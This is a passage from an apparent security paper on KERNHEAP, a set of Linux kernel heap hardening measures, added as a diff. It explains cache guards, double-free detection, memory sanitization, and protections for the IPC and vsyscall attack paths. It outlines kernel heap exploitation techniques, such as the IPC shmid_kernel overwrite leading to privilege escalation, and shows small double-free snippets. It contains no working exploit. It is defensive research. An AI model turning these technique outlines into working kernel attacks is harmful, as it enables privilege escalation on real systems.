+    kernel allocators (SLUB, SLAB, SLOB, future SLQB, etc.), we assume:
+
+        1. A set of caches exist which hold dynamically allocated slabs,
+           composed of one of more physically contiguous pages, containing
+           same size chunks.
+
+        2. These are initialized by default or created explicitly, always
+           with a known size. For example, multiple default caches exist to
+           hold slabs of common sizes which are a multiple of two (32, 64,
+           128, 256 and so forth).
+
+        3. These caches grow or shrink in size as required by the
+           allocator.
+
+        4. At the end of a kmem cache life, it must be destroyed and its
+           slabs released. The linked list of slabs is implicitly trusted
+           in this context.
+
+        5. The caches can be allocated contiguously, or adjacent to an
+           actual chain of slabs from another cache. Because the current
+           kmem_cache structure holds potentially harmful information
+           (including a pointer to the constructor of the cache), this
+           could be leveraged in an attack to subvert the execution flow.
+
+        6. The debugging facilities of these allocators provide a merely
+           informational value with their error detection mechanisms, which
+           are also inherently insecure. They are not enabled by default
+           and have a extremely high performance impact (accounting up to
+           50 to 70% slowdown). In addition, they leak information which
+           could be invaluable for a local attacker (ex. fixed known
+           values).
+
+    We are facing multiple issues in this scenario. First, the kernel
+    developers expect the third-party to handle situations like a cache
+    being destroyed while an object is being allocated. Albeit highly
+    unusual, such circumstances (like {6}) can arise provided the right
+    conditions are present.
+
+    In order to prevent {5} from being abused, we are left with two
+    realistic possibilities to deter a potential attack: randomization of
+    the allocator routines (see ASLR from the PaX documentation in [7] for
+    the concept) or introduce a guard (known in modern times as a 'cookie')
+    which contains information to validate the integrity of the kmem_cache
+    structure.
+
+    Thus, a decision was made to introduce a guard which works in
+    'cascade':
+
+        +--------------+
+        | global guard |------------------+
+        +--------------| kmem_cache guard |------------+
+                       +------------------| slab guard | ...
+                                          +------------+
+
+    The idea is simple: break down every potential path of abuse and add
+    integrity information to each lower level structure. By deploying a
+    check which relies in all the upper level guards, we can detect
+    corruption of the data at any stage. In addition, this makes the safety
+    checks more resilient against information leaks, since an attacker will
+    be forced to access and read a wider range of values than one single
+    cookie. Such data could be out of range to the context of the execution
+    path being abused.
+
+    The global guard is initialized at the kernheap_init()
+    function, called from init/main.c during kernel start. In order to
+    gather entropy for its value, we need to initialize the random32 PRNG
+    earlier than in a default, upstream kernel. On x86, this is done with
+    the rdtsc xor'd with the jiffies value, and then seeded multiple times
+    during different stages of the kernel initialization, ensuring we have
+    a decent amount of entropy to avoid an easily predictable result.
+
+    Unfortunately, an architecture-independent method to seed the PRNG
+    hasn't been devised yet. Right now this is specific to platforms with a
+    working get_cycles() implementation (otherwise it falls back to a more
+    insecure seeding using different counters), though it is intended to
+    support all architectures where PaX is currently supported.
+
+    The slab and kmem_cache structures are defined in mm/slab.c and
+    mm/slub.c for the SLAB and SLUB allocators, respectively. The kernel
+    developers have chosen to make their type information static to those
+    files, and not available in the mm/slab.h header file. Since the
+    available allocators have generally different internals, they only
+    export a common API (even though few functions remain as no-op, for
+    example in SLOB).
+
+    A guard field has been added at the start of the kmem_cache structure,
+    and other structures might be modified to include a similar field
+    (depending on the allocator). The approach is to add a guard anywhere
+    where it can provide balanced performance (including memory footprint)
+    and security results.
+
+    In order to calculate the final checksum used in each kmem_cache and
+    their slabs, a high performance, yet collision resistant hash function
+    was required. This instantly left options such as the CRC family, FNV,
+    etc.  out, since they are inefficient for our purposes. Therefore,
+    Murmur2 was chosen [9]. It's an exceptionally fast, yet simple
+    algorithm created by Austin Appleby, currently used by libmemcached and
+    other software.
+
+    Custom optimized versions were developed to calculate hashes for the
+    slab and cache structures, taking advantage of the fact that only a
+    relatively small set of word values need to be hashed.
+
+    The coverage of the guard checks is obviously limited to the meta-data,
+    but yields reliable protection for all objects of 1/8 page size and any
+    adjacent ones, during allocation and release operations. The
+    copy_from_user() and copy_to_user() functions have been modified to
+    include a slab and cache integrity check as well, which is orthogonal
+    to the boundary enforcement modifications explained in another section
+    of this paper.
+
+    The redzone approach used by the SLAB/SLUB/SLQB allocators used a fixed
+    known value to detect certain scenarios (explained in the next
+    subsection). The values are 64-bit long:
+
+        #define RED_INACTIVE    0x09F911029D74E35BULL
+        #define RED_ACTIVE      0xD84156C5635688C0ULL
+
+    This is clearly suitable for debugging purposes, but largely
+    inefficient for security. An immediate improvement would be to generate
+    these values on runtime, but then it is still possible to avoid writing
+    over them and still modify the meta-data. This is exactly what is being
+    prevented by using a checksum guard, which depends on a runtime
+    generated cookie (at boot time). The examples below show an overwrite
+    of an object in the kmalloc-64 cache:
+
+        slab error in verify_redzone_free(): cache `size-64': memory outside
+        object was overwritten
+        Pid: 6643, comm: insmod Not tainted 2.6.29.2-grsec #1
+        Call Trace:
+         [<c0889a81>] __slab_error+0x1a/0x1c
+         [<c088aee9>] cache_free_debugcheck+0x137/0x1f5
+         [<c088ba14>] kfree+0x9d/0xd2
+         [<c0802f22>] syscall_call+0x7/0xb
+        df271338: redzone 1:0xd84156c5635688c0, redzone 2:0x4141414141414141.
+
+
+        Slab corruption: size-64 start=df271398, len=64
+        Redzone: 0x4141414141414141/0x9f911029d74e35b.
+        Last user: [<c08d1da5>](free_rb_tree_fname+0x38/0x6f)
+        000: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
+        010: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
+        020: 41 41 41 41 41 41 41 41 6b 6b 6b 6b 6b 6b 6b 6b
+        Prev obj: start=df271340, len=64
+
+        Redzone: 0xd84156c5635688c0/0xd84156c5635688c0.
+        Last user: [<c08d1e55>](ext3_htree_store_dirent+0x34/0x124)
+        000: 48 8e 78 08 3b 49 86 3d a8 1f 27 df e0 10 27 df
+        010: a8 14 27 df 00 00 00 00 62 d3 03 00 0c 01 75 64
+        Next obj: start=df2713f0, len=64
+
+        Redzone: 0x9f911029d74e35b/0x9f911029d74e35b.
+        Last user: [<c08d1da5>](free_rb_tree_fname+0x38/0x6f)
+        000: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b
+        010: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b
+
+    The trail of 0x6B bytes can be observed in the output above. This is
+    the SLAB_POISON feature. Poisoning is the approach that will be
+    described in the next subsection. It's basically overwriting the object
+    contents with a known value to detect modifications post-release or
+    uninitialized usage. The values are defined (like the redzone ones) at
+    include/linux/poison.h:
+
+        #define POISON_INUSE    0x5a
+        #define POISON_FREE     0x6b
+        #define POISON_END      0xa5
+
+    KERNHEAP performs validation of the cache guards at allocation and
+    release related functions. This allows detection of corruption in the
+    chain of guards and results in a system halt and a stack dump.
+
+    The safety checks are triggered from kfree() and kmem_cache_free(),
+    kmem_cache_destroy() and other places. Additional checkpoints are being
+    considered, since taking a wrong approach could lead to TOCTOU issues,
+    again depending on the allocator. In SLUB, merging is disabled to avoid
+    the potentially detrimental effects (to security) of this feature. This
+    might kill one of the most attractive points of SLUB, but merging comes
+    at the cost of letting objects be neighbors to other objects which
+    would have been placed elsewhere out of reach, allowing overflow
+    conditions to produce likely exploitable conditions. Even with guard
+    checks in place, this is still a scenario to be avoided.
+
+    One additional change, first introduced by PaX, is to change the
+    address of the ZERO_SIZE_PTR. In mainline kernel, this address points
+    to 0x00000010. An address reachable in userland is clearly a bad idea
+    in security terms, and PaX wisely solves this by setting it to
+    0xfffffc00, and modifying the ZERO_OR_NULL_PTR macro. This protects
+    against a situation in which kmalloc is called with a zero size (for
+    example due to an integer overflow in a length parameter) and the
+    pointer is used to read or write information from or to userland.
+
+    ---[ 3.2 Detection of arbitrary free pointers and freelist corruption
+
+    In the history of heap related memory corruption vulnerabilities, a
+    more obscure class of flaws has been long time known, albeit less
+    publicized: arbitrary pointer and double free issues.
+
+    The idea is simple: a programming mistake leads to an exploitable
+    condition in which the state of the heap allocator can be made
+    inconsistent when an already freed object is being released again, or
+    an arbitrary pointer is passed to the free function. This is a strictly
+    allocator internals-dependent scenario, but generally the goal is to
+    control a function pointer (for example, a constructor/destructor
+    function used for object initialization, which is later called) or a
+    write-n primitive (a single byte, four bytes and so forth).
+
+    In practice, these vulnerabilities can pose a true challenge for
+    exploitation, since thorough knowledge of the allocator and state of
+    the heap is required. Manipulating the freelist (also known as
+    freelist in the kernel) might cause the state of the heap to be
+    unstable post-exploitation and thwart cleanup efforts or graceful
+    returns. In addition, another thread might try to access it or perform
+    operations (such as an allocation) which yields a page fault.
+
+    In an environment with 2.6.29.2 (grsecurity patch applied, full PaX
+    feature set enabled except for KERNEXEC, RANDKSTACK and UDEREF) and the
+    SLAB allocator, the following scenarios could be observed:
+
+        1. An object is allocated and shortly afterwards, the object is
+           released via kfree(). Another allocation follows, and a pointer
+           referencing to the previous allocation is passed to kfree(),
+           therefore the newly allocated object is released instead due to the
+           LIFO nature of the allocator.
+
+                void  *a = kmalloc(64, GFP_KERNEL);
+                foo_t *b = (foo_t *) a;
+
+                /* ... */
+                kfree(a);
+                a = kmalloc(64, GFP_KERNEL);
+                /* ... */
+                kfree(b);
+
+        2. An object is allocated, and two successive calls to kfree() take
+           place with no allocation in-between.
+
+                void  *a = kmalloc(64, GFP_KERNEL);
+                foo_t *b = (foo_t *) a;
+
+                kfree(a);
+                kfree(b);
+
+    In both cases we are releasing an object twice, but the state of the
+    allocator changes slightly. Also, there could be more than just a
+    single allocation in-between (for example, if this condition existed
+    within filesystem or network stack code) leading to less predictable
+    results. The more obvious result of the first scenario is corruption of
+    the freelist, and a potential information leak or arbitrary access to
+    memory in the second (for instance, if an attacker could force a new
+    allocation before the incorrectly released object is used, he could
+    control the information stored there).
+
+    The following output can be observed in a system using the SLAB
+    allocator with is debugging facilities enabled:
+
+        slab error in verify_redzone_free(): cache `size-64': double free detected
+        Pid: 4078, comm: insmod Not tainted 2.6.29.2-grsec #1
+        Call Trace:
+          [<c0889a81>] __slab_error+0x1a/0x1c
+          [<c088aee9>] cache_free_debugcheck+0x137/0x1f5
+          [<c088ba14>] kfree+0x9d/0xd2
+          [<c0802f22>] syscall_call+0x7/0xb
+        df2e42e0: redzone 1:0x9f911029d74e35b, redzone 2:0x9f911029d74e35b.
+
+    The debugging facilities of SLAB and SLUB provide a redzone-based
+    approach to detect the first scenario, but introduce a performance
+    impact while being useless security-wise, since the system won't halt
+    and the state of the allocator will be left unstable. Therefore, their
+    value is only informational and useful for debugging purposes, not as a
+    security measure. The redzone values are also static.
+
+    The other approach taken by the debugging facilities is poisoning, as
+    mentioned in the previous subsection. An object is 'poisoned' with a
+    value, which can be checked at different places to detect if the object
+    is being used uninitialized or post-release. This rudimentary but
+    effective method is implemented upstream in a manner which makes it
+    inefficient for security purposes.
+
+    Currently, upstream poisoning is clearly oriented to debugging. It
+    writes a single-byte pattern in the whole object space, marking the end
+    with a known value. This incurs in a significant performance impact.
+
+    KERNHEAP performs the following safety checks at the time of this
+    writing:
+
+        1. During cache destruction:
+
+            a) The guard value is verified.
+
+            b) The entire cache is walked, verifying the freelists for
+            potential corruption. Reference counters, guards, validity of
+            pointers and other structures are checked.  If any mismatch is
+            found, a system halt ensues.
+
+            c) The pointer to the cache itself is changed to ZERO_SIZE_PTR.
+            This should not affect any well behaving (that is, not broken)
+            kernel code.
+
+        2. After successful kfree, a word value is written to the memory
+           and pointer location is changed to ZERO_SIZE_PTR. This will
+           trigger a distinctive page fault if the pointer is accessed
+           again somewhere. Currently this operation could be invasive for
+           drivers or code with dubious coding practices.
+
+        3. During allocation, if the word value at the start of the
+           to-be-returned object doesn't match our post-free value, a
+           system halt ensues.
+
+    The object-level guard values (equivalent to the redzoning) are
+    calculated on runtime. This deters bypassing of the checks via fake
+    objects, resulting from a slab overflow scenario. It does introduce a
+    low performance impact on setup and verification, minimized by the use
+    of inline functions, instead of external definitions like those used
+    for some of the more general cache checks.
+
+    The effectiveness of the reference counter checks  is orthogonal
+    to the deployment of PaX's REFCOUNT, which protects many object
+    reference counters against overflows (including SLAB/SLUB).
+
+    Safe unlinking is enforced in all LIST_HEAD based linked lists, which
+    obviously includes the partial/empty/full lists for SLAB and several
+    other structures (including the freelists) in other allocators. If a
+    corrupted entry is being unlinked, a system halt is forced. The values
+    used for list pointer poisoning have been changed to point
+    non-userland-reachable addresses (this change has been taken from PaX).
+
+    The use-after-free and double-free detection mechanisms in KERNHEAP are
+    still under development, and it's very likely that substantial design
+    changes will occur after the release of this paper.
+
+    ---[ 3.3 Overview of NetBSD and OpenBSD kernel heap safety checks
+
+    At the moment KERNHEAP exclusively covers the Linux kernel, but it is
+    interesting to observe the approaches taken by other projects to detect
+    kernel heap integrity issues. In this section we will briefly analyze
+    the NetBSD and OpenBSD kernels, which are largely the same code base in
+    regards of kernel malloc implementation and diagnostic checks.
+
+    Both currently implement rudimentary but effective measures to detect
+    use-after-free and double-free scenarios, albeit these are only enabled as
+    part of the DIAGNOSTIC and DEBUG configurations.
+
+    The following source code is taken from NetBSD 4.0 and should be almost
+    identical to OpenBSD. Their approach to detect use-after-free relies on
+    copying a known 32-bit value (WEIRD_ADDR, from kern/kern_malloc.c):
+
+        /*
+         * The WEIRD_ADDR is used as known text to copy into free objects so
+         * that modifications after frees can be detected.
+         */
+        #define	WEIRD_ADDR	((uint32_t) 0xdeadbeef)
+        ...
+
+        void *malloc(unsigned long size, struct malloc_type *ksp, int flags)
+        ...
+        {
+        ...
+        #ifdef DIAGNOSTIC
+			/*
+			 * Copy in known text to detect modification
+			 * after freeing.
+			 */
+			end = (uint32_t *)&cp[copysize];
+			for (lp = (uint32_t *)cp; lp < end; lp++)
+				*lp = WEIRD_ADDR;
+			freep->type = M_FREE;
+        #endif /* DIAGNOSTIC */
+
+    The following checks are the counterparts in free(), which call panic() when
+    the checks fail, causing a system halt (this obviously has a better security
+    benefit than just the information approach taken by Linux's SLAB
+    diagnostics):
+
+        #ifdef DIAGNOSTIC
+            ...
+            if (__predict_false(freep->spare0 == WEIRD_ADDR)) {
+                for (cp = kbp->kb_next; cp;
+                    cp = ((struct freelist *)cp)->next) {
+                    if (addr != cp)
+                        continue;
+                    printf("multiply freed item %p\n", addr);
+                    panic("free: duplicated free");
+                }
+            }
+            ...
+            copysize = size < MAX_COPY ? size : MAX_COPY;
+            end = (int32_t *)&((caddr_t)addr)[copysize];
+            for (lp = (int32_t *)addr; lp < end; lp++)
+                *lp = WEIRD_ADDR;
+            freep->type = ksp;
+        #endif /* DIAGNOSTIC */
+
+    Once the object is released, the 32-bit value is copied, along the type
+    information to detect the potential origin of the problem. This should be
+    enough to catch basic forms of freelist corruption.
+
+    It's worth noting that the freelist_sanitycheck() function provides
+    integrity checking for the freelist, but is enclosed in an ifdef 0 block.
+
+    The problem affecting these diagnostic checks is the use of known values, as
+    much as Linux's own SLAB redzoning and poisoning might be easily bypassed in
+    a deliberate attack scenario. It still remains slightly more effective due
+    to the system halt enforcing upon detection, which isn't present in Linux.
+
+    Other sanity checks are done with the reference counters in free():
+
+        if (ksp->ks_inuse == 0)
+			panic("free 1: inuse 0, probable double free");
+
+    And validating (with a simple address range test) if the pointer being
+    freed looks sane:
+
+        if (__predict_false((vaddr_t)addr < vm_map_min(kmem_map) ||
+	        (vaddr_t)addr >= vm_map_max(kmem_map)))
+		        panic("free: addr %p not within kmem_map", addr);
+
+    Ultimately, users of either NetBSD or OpenBSD might want to enable
+    KMEMSTATS or DIAGNOSTIC configurations to provide basic protection against
+    heap corruption in those systems.
+
+    ---[ 3.4 Microsoft Windows 7 kernel pool allocator safe unlinking
+
+    In 26 May 2009, a suspiciously timed article was published by Peter
+    Beck from the Microsoft Security Engineering Center (MSEC) Security
+    Science team, about the inclusion of safe unlinking into the Windows 7
+    kernel pool (the equivalent to the slab allocators in Linux).
+
+    This has received a deal of publicity for a change which accounts up to
+    two lines of effective code, and surprisingly enough, was already
+    present in non-retail versions of Vista. In addition, safe unlinking
+    has been present in other heap allocators for a long time: in the GNU
+    libc since at least 2.3.5 (proposed by Stefan Esser originally to Solar
+    Designer for the Owl libc) and the Linux kernel since 2006
+    (CONFIG_DEBUG_LIST).
+
+    While it is out of scope for this paper to explain the internals of the
+    Windows kernel pool allocator, this section will provide a short
+    overview of it. For true insight the slides by Kostya Kortchinsky,
+    "Exploiting Kernel Pool Overflows" [14], can provide a through look at
+    it from a sound security perspective.
+
+    The allocator is very similar to SLAB and the API to obtain allocations
+    and release them is straightforward (nt!ExAllocatePool(WithTag),
+    nt!ExFreePool(WithTag) and so forth). The default pools (sort of a
+    kmem_cache equivalent) are the (two) paged, non-paged and session paged
+    ones. Non-paged for physical memory allocations and paged for pageable
+    memory. The structure defining a pool can be seen below:
+
+        kd> dt nt!_POOL_DESCRIPTOR
+          +0x000 PoolType         : _POOL_TYPE
+          +0x004 PoolIndex        : Uint4B
+          +0x008 RunningAllocs    : Uint4B
+          +0x00c RunningDeAllocs  : Uint4B
+          +0x010 TotalPages       : Uint4B
+          +0x014 TotalBigPages    : Uint4B
+          +0x018 Threshold        : Uint4B
+          +0x01c LockAddress      : Ptr32 Void
+          +0x020 PendingFrees     : Ptr32 Void
+          +0x024 PendingFreeDepth : Int4B
+          +0x028 ListHeads        : [512] _LIST_ENTRY
+
+    The most important member in the structure is ListHeads, which contains
+    512 linked lists, to hold the free chunks. The granularity of
+    the allocator is 8 bytes for Windows XP and up, and 32 bytes for
+    Windows 2000. The maximum allocation size possible is 4080 bytes.
+    LIST_ENTRY is exactly the same as LIST_HEAD in Linux.
+
+    Each chunk contains a 8 byte header. The chunk header is defined as
+    follows for Windows XP and up:
+
+        kd> dt nt!_POOL_HEADER
+           +0x000 PreviousSize     : Pos 0, 9 Bits
+           +0x000 PoolIndex        : Pos 9, 7 Bits
+           +0x002 BlockSize        : Pos 0, 9 Bits
+           +0x002 PoolType         : Pos 9, 7 Bits
+           +0x000 Ulong1           : Uint4B
+           +0x004 ProcessBilled    : Ptr32 _EPROCESS
+           +0x004 PoolTag          : Uint4B
+           +0x004 AllocatorBackTraceIndex : Uint2B
+           +0x006 PoolTagHash      : Uint2B
+
+
+    The PreviousSize contains the value of the BlockSize of the previous
+    chunk, or zero if it's the first. This value could be checked during
+    unlinking for additional safety, but this isn't the case (their checks
+    are limited to validity of prev/next pointers relative to the entry
+    being deleted). PooType is zero if free, and PoolTag contains four
+    printable characters to identify the user of the allocation. This isn't
+    authenticated nor verified in any way, therefore it is possible to
+    provide a bogus tag to one of the allocation or free APIs.
+
+    For small allocations, the pool allocator uses lookaside caches, with a
+    maximum BlockSize of 256 bytes.
+
+    Kostya's approach to abuse pool allocator overflows involves the
+    classic write-4 primitive through unlinking of a fake chunk under his
+    control. For the rest of information about the allocator internals,
+    please refer to his excellent slides [14].
+
+    The minimal change introduced by Microsoft to enable safe unlinking in
+    Windows 7 was already present in Vista non-retail builds, thus it is
+    likely that the announcement was merely a marketing exercise.
+    Furthermore, Beck states that this allows to detect "memory corruption
+    at the earliest opportunity", which isn't necessarily correct if they
+    had pursued a more complete solution (for example, verifying that
+    pointers belong to actual freelist chunks). Those might incur in a
+    higher performance overhead, but provide far more consistent
+    protection.
+
+    The affected API is RemoveEntryList(), and the result of unlinking an
+    entry with incorrect prev/next pointers will be a BugCheck:
+
+        Flink = Entry->Flink;
+        Blink = Entry->Blink;
+        if (Flink->Blink != Entry) KeBugCheckEx(...);
+        if (Blink->Flink != Entry) KeBugCheckEx(...);
+
+    It's unlikely that there will be further changes to the pool allocator
+    for Windows 7, but there's still time for this to change before release
+    date.
+
+------[ 4. Sanitizing memory of the look-aside caches
+
+    The objects and data contained in slabs allocated within the kmem
+    caches could be of sensitive nature, including but not limited to:
+    cryptographic secrets, PRNG state information, network information,
+    userland credentials and potentially useful internal kernel state
+    information to leverage an attack (including our guards or cookie
+    values).
+
+    In addition, neither kfree() nor kmalloc() zero memory, thus allowing
+    the information to stay there for an indefinite time, unless they are
+    overwritten after the space is claimed in an allocation procedure. This
+    is a security risk by itself, since an attacker could essentially rely
+    on this condition to "spray" the kernel heap with his own fake
+    structures or machine instructions to further improve the reliability
+    of his attack.
+
+    PaX already provides a feature to sanitize memory upon release, at a
+    performance cost of roughly 3%. This an opt-all policy, thus it
+    is not possible to choose in a fine-grained manner what memory is
+    sanitized and what isn't. Also, it works at the lowest level possible,
+    the page allocator. While this is a safe approach and ensures that all
+    allocated memory is properly sanitized, it is desirable to be able to
+    opt-in voluntarily to have your newly allocated memory treated as
+    sensitive.
+
+    Hence, a GFP_SENSITIVE flag has been introduced. While a security
+    conscious developer could zero memory on his own, the availability of a
+    flag to assure this behavior (as well as other enhancements and safety
+    checks) is convenient. Also, the performance cost is negligible, if
+    any, since the flag could be applied to specific allocations or caches
+    altogether.
+
+    The low level page allocator uses a PF_sensitive flag internally, with
+    the associated SetPageSensitive, ClearPagesensitiv and PageSensitive
+    macros. These changes have been introduced in the linux/page-flags.h
+    header and mm/page_alloc.c.
+
+         SLAB / kmalloc layer         Low-level page allocator
+         include/linux/slab.h         include/linux/page-flags.h
+
+           +----------------.           +--------------+
+           | SLAB_SENSITIVE |         ->| PG_sensitive |
+           +----------------.         | +--------------+
+              |                       |      |-> SetPageSensitive
+              |     +---------------+ |      |-> ClearPageSensitive
+              \---> | GFP_SENSITIVE |-/      |-> PageSensitive
+                    +---------------+            ...
+
+    This will prevent the aforementioned leak of information post-release,
+    and provide an easy to use mechanism for third-party developers to take
+    advantage of the additional assurance provided by this feature.
+
+    In addition, another loophole that has been removed is related with
+    situations in which successive allocations are done via kmalloc(), and
+    the information is still accessible through the newly allocated object.
+    This happens when the slab is never released back to the page
+    allocator, since slabs can live for an indefinite amount of time
+    (there's no assurance as to when the cache will go through shrinkage or
+    reaping). Upon release, the cache can be checked for the SLAB_SENSITIVE
+    flag, the page can be checked for the PG_sensitive bit, and the
+    allocation flags can be checked for GFP_SENSITIVE.
+
+    Currently, the following interfaces have been modified to operate with
+    this flag when appropriate:
+
+        - IPC kmem cache
+        - Cryptographic subsystem (CryptoAPI)
+        - TTY buffer and auditing API
+        - WEP encryption and decryption in mac80211 (key storage only)
+        - AF_KEY sockets implementation
+        - Audit subsystem
+
+    The RBAC engine in grsecurity can be modified to add support for
+    enabling the sensitive memory flag per-process. Also, a group id based
+    check could be added, configurable via sysctl. This will allow
+    fine-grained policy or group based deployment of the current and future
+    benefits of this flag. SELinux and any other policy based security
+    frameworks could benefit from this feature as well.
+
+    This patchset has been proposed to the mainline kernel developers as of
+    May 21st 2009 (see http://patchwork.kernel.org/patch/25062). It
+    received feedback from Alan Cox and Rik van Riel and a different
+    approach was used after some developers objected to the use of a page
+    flag, since the functionality can be provided to SLAB/SLUB allocators
+    and the VMA interfaces without the use of a page flag. Also, the naming
+    changed to CONFIDENTIAL, to avoid confusion with the term 'sensitive'.
+
+    Unfortunately, without a page bit, it's impossible to track down what
+    pages shall be sanitized upon release, and provide fine-grained control
+    over these operations, making the gfp flag almost useless, as well as
+    other interesting features, like sanitizing pages locked via mlock().
+    The mainline kernel developers oppose the introduction of a new page
+    flag, even though SLUB and SLOB introduced their own flags when they
+    were merged, and this wasn't frowned upon in such cases. Hopefully this
+    will change in the future, and allow a more complete approach to be
+    merged in mainline at some point.
+
+    Despite the fact that Ingo Molnar, Pekka Enberg and Peter Zijlstra
+    completely missed the point about the initially proposed patches,
+    new ones performing selective sanitization were sent following up their
+    recommendations of a completely flawed approach. This case serves as a
+    good example of how kernel developers without security knowledge nor
+    experience take decisions that negatively impact conscious users of the
+    Linux kernel as a whole.
+
+    Hopefully, in order to provide a reliable protection, the upstream
+    approach will finally be selective sanitization using kzfree(),
+    allowing us to redefine it to kfree() in the appropriate header file,
+    and use something that actually works. Fixing a broken implementation
+    is an undesirable burden often found when dealing with the 2.6 branch
+    of the kernel, as usual.
+
+------[ 5. Deterrence of IPC based kmalloc() overflow exploitation
+
+    In addition to the rest of the features which provide a generic
+    protection against common scenarios of kernel heap corruption, a
+    modification has been introduced to deter a specific local attack for
+    abusing kmalloc() overflows successfully. This technique is currently
+    the only public approach to kernel heap buffer overflow exploitation
+    and relies on the following circumstances:
+
+        1. The attacker has local access to the system and can use the IPC
+           subsystem, more specifically, create, destroy and perform
+           operations on semaphores.
+
+        2. The attacker is able to abuse a allocate-overflow-free situation
+           which can be leveraged to overwrite adjacent objects, also
+           allocated via kmalloc() within the same kmem cache.
+
+        3. The attacker can trigger the overflow in the right timing to
+           ensure that the adjacent object overwritten is under his
+           control.  In this case, the shmid_kernel structure (used
+           internally within the IPC subsystem), leading to a userland
+           pointer dereference, pointing at attacker controlled structures.
+
+        4. Ultimately, when these attacker controlled structures are used
+           by the IPC subsystem, a function pointer is called. Since the
+           attacker controls this information, this is essentially a
+           game-over scenario. The kernel will execute arbitrary code of
+           the attacker's choice and this will lead to elevation of
+           privileges.
+
+    Currently, PaX UDEREF [8] on x86 provides solid protection against
+    (3) and (4). The attacker will be unable to force the kernel into
+    executing instructions located in the userland address space. A
+    specific class of vulnerabilities, kernel NULL pointer deferences
+    (which were, for a long time, overlooked and not considered exploitable
+    by most of the public players in the security community, with few
+    exceptions) were mostly eradicated (thanks to both UDEREF and further
+    restrictions imposed on mmap(), later implemented by Red Hat and
+    accepted into mainline, albeit containing flaws which made the
+    restriction effectively useless).
+
+    On systems where using UDEREF is unbearable for performance or
+    functionality reasons (for example, virtualization), a workaround to
+    harden the IPC subsystem was necessary. Hence, a set of simple safety
+    checks were devised for the shmid_kernel structure, and the allocation
+    helper functions have been modified to use their own private cache.
+
+    The function pointer verification checks if the pointers located within
+    the file structure, are actually addresses within the kernel text range
+    (including modules).
+
+    The internal allocation procedures of the IPC code make use of both
+    vmalloc() and kmalloc(), for sizes greater than a page or lower than a
+    page, respectively. Thus, the size for the cache objects is PAGE_SIZE,
+    which might be suboptimal in terms of memory space, but does not impact
+    performance. These changes have been tested using the IBM ipc_stress
+    test suite distributed in the Linux Test Project sources, with
+    successful results (can be obtained from http://ltp.sourceforge.net).
+
+------[ 6. Prevention of copy_to_user() and copy_from_user() abuse
+
+    A vast amount of kernel vulnerabilities involving information leaks to
+    userland, as well as buffer overflows when copying data from userland,
+    are caused by signedness issues (meaning integer overflows, reference
+    counter overflows, et cetera). The common scenario is an invalid
+    integer passed to the copy_to_user() or copy_from_user() functions.
+
+    During the development of KERNHEAP, a question was raised about these
+    functions: Is there a existent, reliable API which allows retrieval of
+    the target buffer information in both copy-to and copy-from scenarios?
+
+    Introducing size awareness in these functions would provide a simple,
+    yet effective method to deter both information leaks and buffer
+    overflows through them. Obviously, like in every security system, the
+    effectiveness of this approach is orthogonal to the deployment of other
+    measures, to prevent potential corner cases and rare situations useful
+    for an attacker to bypass the safety checks.
+
+    The current kernel heap allocators (including SLOB) provide a function
+    to retrieve the size of a slab object, as well as testing the validity
+    of a pointer to see if it's within the known caches (excluding SLOB
+    which required this function to be written since it's essentially a
+    no-op in upstream sources). These functions are ksize() and
+    kmem_validate_ptr() respectively (in each pertinent allocator source:
+    mm/slab.c, mm/slub.c and mm/slob.c).
+
+    In order to detect whether a buffer is stack or heap based in the
+    kernel, the object_is_on_stack() function (from include/linux/sched.h)
+    can be used. The drawback of these functions is the computational cost
+    of looking up the page where this buffer is located, checking its
+    validity wherever applicable (in the case of kmem_validate_ptr() this
+    involves validating against a known cache) and performing other tasks
+    to determine the validity and properties of the buffer. Nonetheless,
+    the performance impact might be negligible and reasonable for the
+    additional assurance provided with these changes.
+
+    Brad Spengler devised this idea, developed and introduced the checks
+    into the latest test patches as of April 27th (test10 to test11 from
+    PaX and the grsecurity counterparts for the current kernel stable
+    release, 2.6.29.1).
+
+    A reliable method to detect stack-based objects is still being
+    considered for implementation, and might require access to meta-data
+    used for debuggers or future GCC built-ins.
+
+------[ 7. Prevention of vsyscall overwrites on x86_64
+
+    This technique is used in sgrakkyu's exploit for CVE-2009-0065. It
+    involves overwriting a x86_64 specific location within a top memory
+    allocated page, containing the vsyscall mapping. This mapping is used
+    to implement a high performance entry point for the gettimeofday()
+    system call, and other functionality.
+
+    An attacker can target this mapping by means of an arbitrary write-N
+    primitive and overwrite the machine instructions there to produce a
+    reliable return vector, for both remote and local attacks. For remote
+    attacks the attacker will likely use an offset-aware approach for
+    reliability, but locally it can be used to execute an offset-less
+    attack, and force the kernel into dereferencing userland memory. This
+    is problematic since presently PaX does not support UDEREF on x86_64
+    and the performance cost of its implementation could be significant,
+    making abuse a safe bet even against hardened environments.
+
+    Therefore, contrary to past popular belief, x86_64 systems are more
+    exposed than i386 in this regard.
+
+    During conversations with the PaX Team, some difficulties came to
+    attention regarding potential approaches to deter this technique:
+
+        1. Modifying the location of the vsyscall mapping will break
+           compatibility. Thus, glibc and other userland software would
+           require further changes. See arch/x86/kernel/vmlinux_64.lds.S
+           and arch/x86/kernel/vsyscall_64.c
+
+        2. The vsyscall page is defined within the ld linked script for
+           x86_64 (arch/x86/kernel/vmlinux_64.lds.S). It is defined by
+           default (as of 2.6.29.3) within the boundaries of the .data
+           section, thus writable for the kernel. The userland mapping
+           is read-execute only.
+
+        3. Removing vsyscall support might have a large performance impact
+           on applications making extensive use of gettimeofday().
+
+        4. Some data has to be written in this region, therefore it can't
+           be permanently read-only.
+
+    PaX provides a write-protect mechanism used by KERNEXEC, together with
+    its definition for an actual working read-only .rodata implementation.
+    Moving the vsyscall within the .rodata section provides reliable
+    protection against this technique. In order to prevent sections from
+    overlapping, some changes had to be introduced, since the section has
+    to be aligned to page size. In non-PaX kernels, .rodata is only
+    protected if the CONFIG_DEBUG_RODATA option is enabled.
+
+    The PaX Team solved {4} using pax_open_kernel() and pax_close_kernel()
+    to allow writes temporarily. This has some performance impact but is
+    most likely far lower than removing vsyscall support completely.
+
+    This deters abuse of the vsyscall page on x86_64, and prevents
+    offset-based remote and offset-less local exploits from leveraging a
+    reliable attack against a kernel vulnerability. Nonetheless, protection
+    against this venue of attack is still work in progress.
+
+------[ 8. Developing the right regression testsuite for KERNHEAP
+
